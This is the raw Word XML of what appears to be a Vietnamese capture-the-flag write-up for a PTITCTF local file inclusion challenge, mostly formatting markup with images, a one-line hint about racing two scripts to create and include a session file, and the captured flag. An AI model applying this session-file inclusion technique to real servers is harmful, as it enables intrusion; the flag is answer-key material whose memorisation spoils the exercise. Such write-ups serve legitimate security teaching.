    <w:p w14:paraId="3A72E777" w14:textId="65268C48" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463FF16E" w14:textId="40014DCF" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846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47A897F" wp14:editId="4A60690A">
            <wp:extent cx="5943600" cy="29051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933B" w14:textId="11809171" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5863B0" w14:textId="0D12E5D4" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846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Đọc file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2907B183" w14:textId="2731AA9C" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376AE91B" w14:textId="01B7D803" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846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3D2D61D" wp14:editId="5E125E48">
            <wp:extent cx="5308600" cy="2590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9521" w14:textId="0A86A4BB" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6A50B4" w14:textId="753F9F18" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846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Chạy cả hai code  để tạo session file và include session file cùng 1 thời điểm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C757A7" w14:textId="0E7A65EE" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3682B203" w14:textId="77777777" w:rsidR="005138C4" w:rsidRPr="00BC7B4D" w:rsidRDefault="005138C4" w:rsidP="005138C4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7B4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: PTITCTF{mot_bai_lfi_co_ban_ma_phai_khong}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA15AF" w14:textId="77777777" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6952EC92" w14:textId="2D4A8F3B" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20659D62" w14:textId="77777777" w:rsidR="005D1959" w:rsidRPr="00080BF0" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005D1959" w:rsidRPr="00080BF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3A41ECE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9B6B4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7D02B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C72A0D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272678"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E38AD9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8F22C28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FDE81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AAB4654"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95485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5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22C"/>
    <w:rsid w:val="00080BF0"/>
    <w:rsid w:val="000C3A4E"/>
    <w:rsid w:val="001D4A2B"/>
    <w:rsid w:val="001D5E54"/>
    <w:rsid w:val="002F43FD"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003A2999"/>
    <w:rsid w:val="00445D10"/>
    <w:rsid w:val="00467D06"/>
    <w:rsid w:val="005138C4"/>
    <w:rsid w:val="00574E11"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005D1959"/>
    <w:rsid w:val="00685ED1"/>
    <w:rsid w:val="006B0FEC"/>
    <w:rsid w:val="007A7F03"/>
    <w:rsid w:val="007C7515"/>
    <w:rsid w:val="00834A81"/>
    <w:rsid w:val="009218FE"/>
    <w:rsid w:val="00B149AC"/>
    <w:rsid w:val="00BC1FA6"/>
    <w:rsid w:val="00BC7B4D"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C5088D"/>
    <w:rsid w:val="00DE5290"/>
    <w:rsid w:val="00E572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33EF573"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8EB78717-143E-A94F-8B56-D96673D447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38C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3A299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8</Pages>
  <Words>648</Words>
  <Characters>3698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2023-10-28T14:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-14T03:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>